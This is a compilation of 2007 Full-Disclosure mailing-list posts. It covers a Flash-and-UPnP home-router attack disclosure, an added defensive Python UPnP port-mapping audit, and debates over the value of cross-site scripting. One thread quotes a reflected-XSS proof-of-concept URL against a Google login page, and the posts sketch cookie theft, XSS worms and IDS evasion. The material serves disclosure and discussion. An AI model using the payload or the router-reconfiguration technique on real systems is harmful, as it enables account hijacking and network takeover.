[Full-disclosure] Hacking The Interwebs
http://www.gnucitizen.org/blog/hacking-the-interwebs

When the victim visits a malicious SWF file, a 4 step ATTACK will silently execute in the background. At that moment the attacker will have control over their router, pretty much regardless of its model.

*Many of the home routers are vulnerable to this attack as many of them support UPnP to one degree or another.*

The attack does not rely on any bugs. Simply put, when two completely legitimate technologies, Flash and UPnP, are combined together, they compose a vulnerability, which exposes many home networks to a great risk. The attack depends on the fact that most, if not all, routers are UPnP enabled. The UPnP SOAP service can be accessed without authorization over the default Web Admin Interface. With the help of Flash, the attacker can send arbitrary SOAP messages to the router's UPnP control point and as such reconfigure the device in order to enable further attacks.

The most malicious of all malicious things to do when a device is compromised via the attack described in the link pointed at the top of this email, is to change the primary DNS server. That will effectively turn the router and the network it controls into a zombie which the attacker can take advantage of whenever they feel like it. It is also possible to reset the admin credentials and create the sort of onion routing network all bad guys want.

Many routers come with Layer3 portforwarding UPnP service. This is also a potential vector that attackers can use. In cases like this, they will simply expose ports behind the router on the Internet facing side.

*We hope that by exposing this information, we will drastically improve the situation for the future. I think that this is a lot better than keeping it for ourselves or risking it all by giving the criminals the opportunity to have in possession a secret which no one else is aware of.*

The best way to protect against this attack is to turn off UPnP if your router's Admin Interface allows it.
It seems that many routers simply do not have this feature.

More information on related UPnP research can be found here:
http://www.gnucitizen.org/
http://www.gnucitizen.org/blog/steal-his-wi-fi
http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5
http://www.gnucitizen.org/blog/hacking-with-upnp-universal-plug-and-play

GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and well established experts in the Information Security, Black Public Relations (PR) Industries and Hacker Circles with widely recognized experience in the government and corporate sectors and the open source community.

GNUCITIZEN is an ethical, white-hat organization that doesn't hide anything. We strongly believe that knowledge belongs to everyone and we do everything to ensure that our readers have access to the latest cutting-edge research and get alerted of the newest security threats when they come. Our experience shows that the best way of protection is mass information. And we mean that literally!!! It is in the public's best interest to make our findings accessible to the vast majority of people, simply because it is proven that the more people know about a certain problem, the better.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org http://www.hakiri.com

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
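A defender-side audit of what a router's UPnP Internet Gateway Device exposes, added here as an example and not part of the original post or GNUCITIZEN's code: it lists the WAN-connection and Layer3Forwarding services a device description advertises, then parses GetGenericPortMappingEntry responses and flags mappings that publish the router's own admin interface or a management port on the Internet side, which is the port-forwarding risk the post describes. The XML samples, the 192.168.1.1 router address and the management-port list are constructed assumptions.

```python
"""Audit what a home router's UPnP Internet Gateway Device (IGD) exposes: the
WAN-side services its device description advertises and the port mappings it
holds. Added example; every XML document below is constructed sample data."""
from xml.etree import ElementTree as ET

# Constructed device description (what a control point fetches from the
# LOCATION URL announced over SSDP), trimmed to the fields the audit needs.
SAMPLE_DEVICE_DESC = """<root xmlns="urn:schemas-upnp-org:device-1-0"><device>
  <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
  <serviceList><service>
    <serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1</serviceType>
    <controlURL>/upnp/control/layer3f</controlURL>
  </service></serviceList>
  <deviceList><device>
    <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
    <serviceList><service>
      <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
      <controlURL>/upnp/control/wanipc</controlURL>
    </service></serviceList>
  </device></deviceList>
</device></root>"""

# Constructed GetGenericPortMappingEntry responses; an IGD returns one mapping
# per index until it replies with a SpecifiedArrayIndexInvalid fault.
SOAP_HEAD = ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
             '<u:GetGenericPortMappingEntryResponse '
             'xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">')
SOAP_TAIL = "</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>"
SAMPLE_MAPPINGS = [
    SOAP_HEAD + """<NewRemoteHost></NewRemoteHost><NewExternalPort>6881</NewExternalPort>
<NewProtocol>TCP</NewProtocol><NewInternalPort>6881</NewInternalPort>
<NewInternalClient>192.168.1.20</NewInternalClient><NewEnabled>1</NewEnabled>
<NewPortMappingDescription>torrent client</NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>""" + SOAP_TAIL,
    # The kind of mapping the post warns about: the router's own admin interface
    # (192.168.1.1:80) published on the Internet side as TCP port 8080.
    SOAP_HEAD + """<NewRemoteHost></NewRemoteHost><NewExternalPort>8080</NewExternalPort>
<NewProtocol>TCP</NewProtocol><NewInternalPort>80</NewInternalPort>
<NewInternalClient>192.168.1.1</NewInternalClient><NewEnabled>1</NewEnabled>
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>""" + SOAP_TAIL,
]

# Services an unauthenticated LAN control point can use to change how the gateway forwards traffic.
RISKY_SERVICES = {
    "WANIPConnection": "AddPortMapping can publish LAN ports on the Internet side",
    "Layer3Forwarding": "SetDefaultConnectionService changes the default WAN connection",
}
MANAGEMENT_PORTS = {22, 23, 80, 443, 8080}  # assumption: ports worth flagging


def local(tag):
    """Strip the XML namespace from an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]


def advertised_services(desc_xml):
    """Map every serviceType in the description, nested devices included, to its controlURL."""
    services = {}
    for svc in ET.fromstring(desc_xml).iter():
        if local(svc.tag) == "service":
            fields = {local(c.tag): (c.text or "").strip() for c in svc}
            services[fields.get("serviceType", "")] = fields.get("controlURL", "")
    return services


def service_findings(services):
    """Flag advertised services that let anyone on the LAN reconfigure the router."""
    findings = []
    for stype, url in services.items():
        name = stype.split(":")[-2] if stype.count(":") >= 2 else stype
        if name in RISKY_SERVICES:
            findings.append(f"{name} at {url}: {RISKY_SERVICES[name]}")
    return findings


def parse_mapping(soap_xml):
    """Parse one GetGenericPortMappingEntry response into a dict of its New* arguments."""
    fields = {local(el.tag): (el.text or "").strip() for el in ET.fromstring(soap_xml).iter()}
    m = {k: v for k, v in fields.items() if k.startswith("New")}
    m["NewExternalPort"], m["NewInternalPort"] = int(m["NewExternalPort"]), int(m["NewInternalPort"])
    return m


def mapping_findings(m, router_ip="192.168.1.1"):
    """Reasons an active mapping deserves a look; empty when it looks like a normal LAN-host mapping."""
    if m["NewEnabled"] != "1":
        return []
    reasons = []
    if m["NewInternalClient"] == router_ip:
        reasons.append("target is the router itself: its admin interface becomes reachable from the WAN")
    if m["NewInternalPort"] in MANAGEMENT_PORTS:
        reasons.append(f"internal port {m['NewInternalPort']} is a management port")
    if not m["NewPortMappingDescription"]:
        reasons.append("no description identifies the application that requested it")
    who = m["NewRemoteHost"] or "any remote host"
    route = f"{m['NewProtocol']} {m['NewExternalPort']} from {who} -> {m['NewInternalClient']}:{m['NewInternalPort']}"
    return [f"{route}: {r}" for r in reasons]


def audit(desc_xml, mapping_xmls, router_ip="192.168.1.1"):
    """Combine service and port-mapping findings for one gateway."""
    findings = service_findings(advertised_services(desc_xml))
    for xml in mapping_xmls:
        findings.extend(mapping_findings(parse_mapping(xml), router_ip))
    return findings
```

Against a real gateway the same functions apply to the description fetched from the SSDP LOCATION URL and to the responses of a GetGenericPortMappingEntry loop over increasing NewPortMappingIndex values.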
Re: [Full-disclosure] authentic hackers still do it for the love ... (was: Hell Camp: It never pays enough)
right, this is what I like to call hacker romanticism, but do you know what? it does not work this way! only in the movies, I guess! so if you are a hacker, if you truly believe that you are a hacker, then you will find a way to be better off than anybody else without the need to break any laws and without compromising your passions at all. there is one very old Chinese saying: find a job that you love and you will never work for the rest of your life.

Being a technically talented person and spending your life as a poor sysadmin is plain stupid, not to say completely unnecessary. Running away from money because you think that it will corrupt you or compromise your identity is also quite retarded to say, don't you think? money is just a means to an end, a tool of trade, and sometimes this is exactly what you need in order to cross to the next level.

hacking is not about the inner geek and the vision of the lonely cyber warrior. hacking is about outsmarting others. it is about thinking creatively and moreover, thinking differently. if you can hack computer systems, then hack life. you will soon realize that the skills that you have obtained while being a technical hacker can be applied to many other disciplines, and these skills are more valuable than you think. collecting the fruits of your work is the most rewarding feeling.

the problem I see is that hacking has become something that it is not. the computer security hacker circles lost the sense of creativity and turned it into plain procedure. most, if not all, of the security vulnerabilities discovered today are discovered due to simple rules. you do this, you run that, you wait, you've got it. this is not hacking. given enough time, anybody can learn that. but embracing the mindset is something that few can do.

btw, GC is currently running a project to show the reality of what I've just said.
it is still in a very initial stage but it will get better with time: hakiri.com

On Dec 2, 2007 6:28 AM, coderman [EMAIL PROTECTED] wrote:
On Dec 1, 2007 9:12 PM, Goebbels Amadeus [EMAIL PROTECTED] wrote:
... Have you ever considered your future in their hands? You've been working for 50 years, your liver and kidneys start failing, creating visible symptoms, stains in your skin. You can't handle life in the same way anymore. For what? What have you done in those 50 years but serving another man to become more wealthy and over powered. The approaching day of your death and its mere vision strikes you like a burning iron blade. ... talented youth started emerging and dedicated passionately to fulfill its curiosity. Day after day, spending countless hours in front of a machine. Understanding its inner design and details, breaking it apart and reassembling it the way it wasn't meant to be assembled.

[a parable of looking for filthy lucre in a trade of love, only to discover that these dark funds have tainted the joy and purity of a process and lifestyle that once brought fulfillment]

sooner or later every authentic hacker discovers that you must separate work from play. when you try and mix them both you betray the joy and fulfillment of hacking for a paycheck, and it never pays enough. the ability of a person to deny and downplay this reality will determine their ability to abide the infosecwhore industry. as captain of their own independent ship they can insulate themselves from much of this whoreish taint, but sooner or later a labor for lucre will destroy the love.

no need to preach, the authentic hacker will discover this on their own accord sooner or later. it is inevitable. for those of you on the cusp of this realization and ready to start anew, do it. abandon ship. find a comfy admin or analyst position with decent benefits and a wage that pays the mortgage. adopt that pseudonym and rediscover the joy of hacking for its own sake.
the rewards are still there, worth more than a dollar can provide...

---

as with any broad categorization there are exceptions to this rule. there is a minuscule minority that has found an amalgamation sufficiently lucrative and deeply enjoyable without compromising on any personal integrity. to these people i say: you lucky fucks! may i find such fortune one day...

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Gmail 0day
this means a lot today :) if you haven't noticed!

On Nov 8, 2007 10:00 PM, silky [EMAIL PROTECTED] wrote:
On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote:
well this XSS can lead to so much data being stolen that it is not even funny!

orly?

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Gmail 0day
well this XSS can lead to so much data being stolen that it is not even funny!

On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote:
wow ! 0day ! damn, right now 0day are fucking XSS ...

On 11/8/07, silky [EMAIL PROTECTED] wrote:
worked for me minutes after it was posted. seems fixed now.

On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
i tested it on gmail latest version, it's not working for me?

On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
There is a html injection vulnerability in https://www.google.com. It is very critical, you can get the cookie to login into gmail or other service.
POC: https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1
More: http://xss2root.blogspot.com/

-- advertise on secgeeks? http://secgeeks.com/Advertising_on_Secgeeks.com http://newskicks.com

-- mike http://lets.coozi.com.au/

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] on xss and its technical merit
comments inlined

On Nov 5, 2007 12:07 AM, reepex [EMAIL PROTECTED] wrote:
On Nov 4, 2007 4:43 PM, pdp (architect) [EMAIL PROTECTED] wrote:
lets say 1 servers are running a vuln ftpd and another 1 are running the same open source web app. Which would you rather have the exploit for? also which would be more practical to attack? assuming you have the same system and a good exploit you could get all the 1 ftpds, while the xss on 1 msg boards would require 1 users to view the page you attacked.

well I will go for the 1 ftpds in general. However, it really depends on what I am doing. As I said, these FTPDs may give you access to the system but probably not access to the data which to me is a lot more interesting. In this case 1 XSS sounds a lot more valuable.

Which 'data' are you talking about? the servers info (in this case the server running the ftpd daemon) or the data/personal machines of the users of the ftpd? I would rather have control of the ftpd then simply backdoor the daemon to work on individual users, just as I would rather have control of the web server itself rather than any pre-existing xss bugs. again the whole point is that you do not need xss ever if you have client side exploits or access to the server itself.

well of course. I would like to control the server as well but sometimes this is simply not possible or feasible in any way. remember, we are not talking about whether XSS is suitable for all kinds of attacks. We are talking about the technical merits of XSS. Keep in mind that many client side exploits are XSS for the browser, as I've already mentioned. Well for example, the FTP and the Web server both have to be in the DMZ. However the Web server also needs to speak to the Application Server. Compromising the FTP server does not give you anything apart from control over the FTP. You have no access to the data probably. If you compromise the Web server, ok fair enough, this is more than critical but again, how feasible is it I don't know?
There are XSS script kiddies as well as Buffer Overflow script kiddies. Just because you can find XSS does not mean that you've done something amazing and extraordinary. It takes skills and a lot of effort to make something out of it. But as I said before, open your mind. There are endless potentials when it comes to XSS.

yes and i guess bad for you is that the only xss you really see posted (fd, milw0rm, security focus) is people posting <script>alert('hi')</script>

BTW, it does look like an achievement when you find a XSS inside an application that 1000 more people play with (look for similar bugs) on a daily basis. XSS in some small apps are stupid. XSS on the default Google Search Interface is as valuable as a remotely exploitable buffer overflow for Linux 2.6.x kernels (distribution independent).

Again i think if you are attacking the users of a site instead of the site itself this is acceptable but your attacks could become much more hazardous if you owned the google server itself (maybe a stretch in the case of google) and added whatever code you wanted to the front page/ or embedded your nice browser exploit in the page. either of these ways seems much more valuable than xssing people who are signed in and visited your page.

ok... but what are the chances of hacking into the Google Web server? Close to nothing, especially when you are dealing with closed source software. One of the ways to own the server is to trick the admins into visiting a page which will steal their authenticated sessions or infect their browsers. IMHO, this one makes a lot more sense and sounds a lot more feasible. One of the things that I like about XSS in general is that in order to exploit a vulnerability you really have to plan every stage of the attack. Setting traps and making Google's and Yahoo's systems play your game is an extraordinary experience and a great eye opener.
also (unless im missing something) in another email you mentioned like 15 different kinds of xss which I am sure are all interesting in their own way but the most you can get out of them is simple browser games.

As I said, this is not the case. Chrome based XSS, we covered a few in the XSS book I believe, are very different, for example. In some cases the XSS vector resides inside a Sandbox. Now you need to find a way to get out of the sandbox and as such reach again the browser internals. Flash based XSS can lead to a lot of damage especially when combined with something like desktop AIR applications which are granted full control over the client machine. AIR also can run HTML pages which also can lead to elevated privileges and as such access to the system. What about desktop and mobile Widgets? XSS, like Buffer Overflow attacks, can be very customized. In terms of Flash, for example, you need to know how the Flash file is structured. You
Re: [Full-disclosure] on xss and its technical merit
reepex they are not weaker. they are different. in situations where the corporate network is protected by two layers of different types of firewalls, IPS, IDS, etc, etc ... one of the ways to sneak in is via XSS. Buffer Overflow won't work cuz you can attack only machines that are on the Internet facing side. You have a bunch of firewalls and IDSs which will stop any packet the data of which contains something like a nop sled. Ok you might be able to evade the IDS detection by replacing the nop sled with other types of useless but equal to performing nothing instructions but you must admit that we are pushing BFs here too much. BF is not a universal solution. XSS in this case will serve almost the same maybe even better job.

Moreover, the technical expertise that is required in order to get something like the XSS scenario pointed above, is beyond the capabilities of most security guys out there. you need to have a very good understanding about browsers, networks, the web in general and other things like that, because once your payload is dropped inside the corporate network you are blind as a bat. You have no idea what you are doing. You have no control over the process. Believe me, it is really hard to pull a trick like that. I've done it a few times for demonstration purposes and I needed to spend 5 days on average in research and testing prior to the exercise. Not to mention that in order to pass by some IDS you have to be very creative with how you are obfuscating the payload.

Oh, when speaking about payloads, XSS is a very different beast when compared to BF attacks. The payload is custom every time. This is the reason why I started coding AttackAPI as a library rather than an exploitation toolkit like Metasploit.

Here, I would like to draw your attention to the origins of XSS cuz I believe that you as well as others are very confused about what this attack is all about.
The attack came as an alternative to the client-side exploits Georgi Guninski was releasing for IE at the time. The issue was not new but I believe David Ross and a bunch of other guys from Microsoft first described it in a formal manner. The attack was known as script injection before that. Cross-site scripting is a rather misleading name. We are not cross scripting sites. We are cross scripting origins. For example: https://google.com and http://google.com are the same site. But https://google.com is not accessible to http://google.com, i.e. they are in different origins. Therefore Cross-site scripting should really be called Cross-origin Scripting.

Cross-origin Scripting is nothing more but the attack vector known as Cross-zone scripting, the root cause for browser/client-side vulnerabilities. Therefore, any client-side exploit that relies on injecting scripts into a different origin is XSS. Keep in mind that I am following a very simple logic here. Even my grandfather can understand that. Also, remote file includes should be known as a form of XSS. Why? Cuz we are scripting a different origin again. SQL Injection is also a form of XSS - we are scripting the origin of the SQL backend. However, let's not use XSS in this way cuz I believe a lot of people will get even more confused about it. You may disagree but this is how I see it and I stick behind my words as I've done so far.

XSS is a largely complicated type of attack. It is very hard to pull and requires a lot of technical knowledge. It is easy to find useless XSS vectors but exploiting them is an art very few can practice at the moment. The beauty of buffer overflow exploits is in their sharpness. The beauty of XSS is in the imagination of the attacker and the level of tangled complexity you have to deal with.

On Nov 5, 2007 12:11 AM, reepex [EMAIL PROTECTED] wrote:
you see i do not agree with this because you are relying on other bugs to make xss useful and again you are relying on interaction from the user.
any bug that requires another (form of) bug to be useful or that requires user interaction is inherently weaker than any other bugs like bof/sql injection/whatever

On Nov 4, 2007 5:16 PM, pdp (architect) [EMAIL PROTECTED] wrote:
well valid point. XSS can always be used as a carrier to whatever kind of attack you have in there. Just imagine the MySpace XSS worm combined with the IE VML or one of these ActiveX bugs that allow you to write into arbitrary files on the file system (so that it is not a software bug). Hmmm?

On Nov 4, 2007 11:51 PM, [EMAIL PROTECTED] wrote:
What about when xss leads to stack overflows and command injections? See http://xs-sniper.com. It would seem that if you subscribe to the thought that only attacks that take over a victims computer are valid, then you would have to now admit xss as valid as well.
Nate
Sent via BlackBerry from T-Mobile

-----Original Message-----
From: reepex [EMAIL PROTECTED]
Date: Sun, 4 Nov 2007 13:26:17
To: full-disclosure@lists.grok.org.uk, pdp (architect) [EMAIL
Re: [Full-disclosure] on xss and its technical merit
comments inlined

On Nov 4, 2007 8:01 PM, Volker Tanger [EMAIL PROTECTED] wrote:
Greetings!

On Sun, 4 Nov 2007 13:26:17 -0600 reepex [EMAIL PROTECTED] wrote:
we are talking about whether XSS is as technical as other security disciplines. We are also talking about whether it should have a deserved and recognized place among FD readers and contributors. [...] 1) XSS isn't technical no matter how it's used [...] 3) XSS does not have a place on this list or any other security list and i remember when the idea of making a separate bugtraq for xss was proposed and i still think it should be done.

XSS is a variant on missing or lax input verification. Thus all other forms of input-nonverification like buffer overflows or char(0) injections or the like should be handled similarly.

agree!

In its simplest version XSS could be used for phishing - which is bad enough for banking or business portals. Depending on the application other elevations might be possible through XSS like session stealing, cmd/sql injects, etc. Especially if such an elevated XSS was detected for a software it definitely would have a place on security mailing lists. But it should be more qualified than just "XSS found on ." Just running a XSS scanner is lame - whereas finding out all consequences and possible attack vectors and maybe even posting a patch might be a worthwhile posting.

XSS has already been detected in software... AOL Instant Messenger was vulnerable to XSS not that long time ago. The default screen where you type all your text is nothing more but the IE web browser. Google GTalk and Skype also use the IE browser. The AOL IM was vulnerable to an attack where remote users can send a specially crafted message which will render within the context of the remote IE instance. IE within AOL runs with full privileges, i.e. there is no sandbox. This means that you can easily start running WScript (WSH) scripts. We know what that leads to, do we?
This is a variation of XSS that affects client-side technologies. This bug could have led to one of the biggest worm outbreaks ever seen. No user interaction was required in order to launch the attack!

Bye
Volker
-- Volker Tanger http://www.wyae.de/volker.tanger/ -- [EMAIL PROTECTED] PGP Fingerprint 378A 7DA7 4F20 C2F3 5BCC 8340 7424 6122 BB83 B8CB

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] on xss and its technical merit
with it. Good luck!

5) publishing xss shows your weakness and that you dont have the ability to find actual bugs ( b/c xss isnt a vuln its crap )

publishing XSS makes you look stupid as well as publishing a DoS cuz you haven't investigated enough to see whether and how your findings can be exploited. moreover, publishing XSS is not ethical. it is wrong and people should stop doing it. or at least stop bragging about it. However, just because you found an interesting XSS vector, it does not mean that you are stupid or an idiot. there are some very clever XSS attacks and clever people that stay behind them. again, I don't want to involve these people into the discussion against their will, so I will contact them personally and ask whether they would like to be mentioned.

reepex, I am sorry but all your statements are groundless. I was expecting something more from you, especially after we exchanged a few private emails. sometimes, I get the feeling that you actually know what you are talking about. you definitely know a few things but c'mon, really... give me something juicy...

cheers, pdp

P.S. I am sorry for the inconvenience.. this message has to be approved first. I am not a FD member and the list management interface is unresponsive at the moment.

On Nov 4, 2007 7:26 PM, reepex [EMAIL PROTECTED] wrote:
Pdp architect and I have been emailing back and forth about whether xss has a place in fd, bugtraq, or the security research area at all. He decided that we should start a discussion about it on here and get peoples unmoderated opinion. This discussion should not concern whether its important due to stealing bank info, paypal, whatever it should only stick to xss as a pure research area. Or as pdp described it: we are talking about whether XSS is as technical as other security disciplines. We are also talking about whether it should have a deserved and recognized place among FD readers and contributors.
however, the topic wont cover only whether you can detect or inject XSS, this is lame. it will cover the whole 9 yards... pretty much all the topics covered inside the XSS book.

My ideas on the topic are
1) XSS isn't technical no matter how it's used
2) people who use xss on pentests/real hacking/anything but phishing are lame and only use it because they cannot write real exploits (non-web) or couldn't find any other web bugs (sql injection, cmd exec, file include, whatever)
3) XSS does not have a place on this list or any other security list and i remember when the idea of making a separate bugtraq for xss was proposed and i still think it should be done.
4) if you go into a pentest/audit and all you get out is xss then its a failed pentest and the customer should get a refund.
5) publishing xss shows your weakness and that you dont have the ability to find actual bugs ( b/c xss isnt a vuln its crap )

i think pdp is going to respond first. should be fun ;)

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] on xss and its technical merit
your weakness and that you dont have the ability to find actual bugs ( b/c xss isnt a vuln its crap )

Imho a xss is a vuln as much as the others, since if used smartly it could get quite dangerous. Reading a report from zone-h i read that the most effective hacking cause is the xss.. i don't know if i shall agree with this, but obviously it should make us think about it.

bye
/nexus

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] on xss and its technical merit
comments inlined...

On Nov 4, 2007 9:26 PM, reepex [EMAIL PROTECTED] wrote:
i seemed to reply to nexxus as you were writing your original reply which ive since replied to. about this email though...

On Nov 4, 2007 3:13 PM, pdp (architect) [EMAIL PROTECTED] wrote:
XSS today is where buffer overflows were 10-15 years ago. Moreover, did you miss when I said that 99% of all sites are vulnerable to XSS. Given the percentage of available XSS vulnerabilities, what chance you think you have finding one? simple math! of course it is easy. It is easy for most of XSS issues. However, those that really matter are not easy at all. DOM based XSS is a debug hell, mainly because every time you want to do something you have to deal with the remote server. This is not very offline.

yes buffer overflows were everywhere then and yes xss is everywhere now. but to say that xss is the buffer overflow of 15 years ago is not a good comparison. Even if xss evolves for 15 years, which it may, would the result be as damaging as even simple stack based overflows have been? Could you have such mass damage worms as overflows have caused? I know there has been myspace worms (which you mention), but xss cannot have the same effect as overflows to a server.

MySpace grew from 20 infected profiles to over 3 million in less than 24 hours. I am not very good at computer virology, but to my knowledge, this is the fastest spreading worm ever. Today XSS worms can be a lot more powerful. I wrote a paper on that called "For my next trick... hacking Web2.0". Check it out if you trust my professional input.

lets say 1 servers are running a vuln ftpd and another 1 are running the same open source web app. Which would you rather have the exploit for? also which would be more practical to attack? assuming you have the same system and a good exploit you could get all the 1 ftpds, while the xss on 1 msg boards would require 1 users to view the page you attacked.

well I will go for the 1 ftpds in general.
However, it really depends on what I am doing. As I said, these FTPDs may give you access to the system but probably not access to the data which to me is a lot more interesting. In this case 1 XSS sounds a lot more valuable.

xss just does not have the same potential as overflows do unless browsers develop some new technology or extend an old one to let client side scripting have much more control on the system.

they don't have the same potentials yet but they can be as nasty as buffer overflows. as I said, most of the applications people use today are located on the Web. In this case owning their machine is pointless. OK, you will be able to install sniffers and keyloggers but for what? You can simply infect their profile with XSS so every time they open the application you gain control. Isn't that the same? Hook the victims on a XSS proxy such as Carnaval and you have a botnet. The concepts are exactly the same. The only difference is that Web applications are written with Web technologies, where bin applications are compiled from C, or whatever language you have, sources. So XSS for Webs is like Buffer Overflows for Bins.

if you want to do it right, then it is harder to get a successful XSS attack. do you know why? cuz XSS involves a bit of strategy as well. because it is an indirect type of attack. A single XSS attack sometimes may involve several sub XSS each one of which calls the next one in an exponential manner. By the time you reach level 5 your head is so screwed up that you need to start all over again because your code breaks in 50 places. JavaScript in particular is not an easy language. You may think that you know it but you don't know 90% of it. When it comes to scoping you get into a mess of things. Have you ever done XSS on GMail? Try it! See how far you will go. Unless you have some solid understanding of AJAX debugging and some nifty tools that can put back Google's mess into order, you have no chance.
Today software hackers rely on tools such as IDA Pro or Soft Ice, which is discontinued but still. Check this out: there are no tools like that for XSS and in particular AJAX, therefore I have to start from zero. Where is my JavaScript deobfuscator? I don't have one... I have to write it myself. Where is my debugger? I am stuck with Firebug for Firefox... Great! How about dynamic tracing, tracking, stepping and all other things on a complete BlackBox application where you can only see the incoming and outgoing requests. At least when you have a binary you know what it is. You can do it offline and you have all of the parts. XSS can be very complicated. Don't be fooled by what people post on FD.

the problem is that if you are going to xss 5 times deep why cant you just find a client side browser bug? you are researching how to basically steal credentials/force requests/steal accounts when one browser
Re: [Full-disclosure] on xss and its technical merit
dude, are you a bot? cuz you answer like a bot.. completely out of context and without any sort of sense... listen, English is not my first language either but at least I am trying. I would suggest to go back and re-read the email over and over again until you understand the meaning.

On Nov 4, 2007 11:07 PM, Dude VanWinkle [EMAIL PROTECTED] wrote:

On 11/4/07, reepex [EMAIL PROTECTED] wrote:

On Nov 4, 2007 3:13 PM, pdp (architect) [EMAIL PROTECTED] wrote: This is not very offline.

So you are taking people's offline conversations and posting them against their wishes? Are you trying to make a name for yourself by saying look this guy actually talks to me? What a joke. -JP

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
well, valid point. XSS can always be used as a carrier to whatever kind of attack you have in there. Just imagine the MySpace XSS worm combined with the IE VML or one of these ActiveX bugs that allow you to write into arbitrary files on the file system (so that it is not a software bug). Hmmm?

On Nov 4, 2007 11:51 PM, [EMAIL PROTECTED] wrote:

What about when xss leads to stack overflows and command injections? See http://xs-sniper.com. It would seem that if you subscribe to the thought that only attacks that take over a victim's computer are valid, then you would have to now admit xss as valid as well. Nate

Sent via BlackBerry from T-Mobile

-Original Message- From: reepex [EMAIL PROTECTED] Date: Sun, 4 Nov 2007 13:26:17 To: full-disclosure@lists.grok.org.uk, pdp (architect) [EMAIL PROTECTED] Subject: [Full-disclosure] on xss and its technical merit

Pdp architect and I have been emailing back and forth about whether xss has a place in fd, bugtraq, or the security research area at all. He decided that we should start a discussion about it on here and get people's unmoderated opinion. This discussion should not concern whether it's important due to stealing bank info, paypal, whatever; it should only stick to xss as a pure research area. Or as pdp described it: we are talking about whether XSS is as technical as other security disciplines. We are also talking about whether it should have a deserved and recognized place among FD readers and contributors. however, the topic won't cover only whether you can detect or inject XSS, this is lame. it will cover the whole 9 yards... pretty much all the topics covered inside the XSS book.
My ideas on the topic are
1) XSS isn't technical no matter how it's used
2) people who use xss on pentests/real hacking/anything but phishing are lame and only use it because they cannot write real exploits (non-web) or couldn't find any other web bugs (sql injection, cmd exec, file include, whatever)
3) XSS does not have a place on this list or any other security list and i remember when the idea of making a separate bugtraq for xss was proposed and i still think it should be done.
4) if you go into a pentest/audit and all you get out is xss then it's a failed pentest and the customer should get a refund.
5) publishing xss shows your weakness and that you don't have the ability to find actual bugs (b/c xss isn't a vuln, it's crap)
i think pdp is going to respond first. should be fun ;)

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] on xss and its technical merit
comments inlined! I have to cuz you inlined yours

On Nov 4, 2007 9:04 PM, reepex [EMAIL PROTECTED] wrote:

On Nov 4, 2007 2:41 PM, pdp (architect) [EMAIL PROTECTED] wrote:

1) XSS isn't technical no matter how it's used

Also, as with buffer overflows and other attacks, which are more or less related to them, attackers need to take into consideration the execution flow and as such make the attack stealthier.

I agree with this on a very high level but not in actual application. Having limited chars in a xss isn't really comparable to having limited characters in a buffer overflow. having A-Za-z0-9 in xss only limits what scripting elements you can use while the same for bin exploiting makes you rely only on opcodes and addresses in that range. Writing alphanumeric shellcode compared to writing limited xss (esp with the ease you can redirect to other pages and thus not be limited at all) is not even a close comparison technically. Also controlling execution flow of a browser where you only control javascript or similar is nowhere near as challenging as having to control the execution of a binary or even more so a kernel after you have destroyed much of its data and have to repair it to a usable state after.

I agree, it is more complicated but don't you think that you have most of the tools already built for you? for example, I needed to write my own shell like interface for firefox just to get some of these nifty BASH tricks working when doing Web based attacks, including finding and exploiting of XSS. The only reason bin exploits are harder is because you have to deal with opcodes. So, this does not mean that you are smarter... it just means that you are nerdier. It does require a lot of effort to get going... I agree. And I have a great respect for everyone that does it. But I don't think that it is something I cannot personally get my head around if I really want to.
It is all about dedication, something that I and a lot of XSS people have already shown that we have in some solid forms. But if you are saying that JavaScript is easier to read than opcodes, you are right!

2) people who use xss on pentests/real hacking/anything but phishing

XSS is by far the only way to run untrusted code within the origins of a trusted domain without having a browser vulnerability in the first place. SQL Injection and file inclusion attacks still exist, I deal with them on a daily basis, but the attack surface is largely mitigated by various types of frameworks which power most of the modern applications. However, why do you need SQL Injection when you can perform the needed action on behalf of the user by using XSS? It is safer and a lot stealthier. If you want to change someone's details or want to get some data out, XSS is a completely valid type of attack.

